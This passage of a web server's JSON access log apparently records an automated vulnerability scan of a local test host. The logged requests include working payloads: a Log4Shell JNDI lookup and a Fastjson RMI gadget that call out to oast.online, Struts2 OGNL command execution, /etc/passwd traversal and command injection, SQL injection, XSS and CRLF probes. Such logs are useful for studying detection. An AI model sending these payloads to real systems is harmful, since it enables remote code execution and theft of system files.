+0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.ca28q98smpvbk9ig07h0e7dzdadacoqja.oast.online}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/?next=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://ca28q98smpvbk9ig07h0xwzauz5wawh3n.oast.online/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 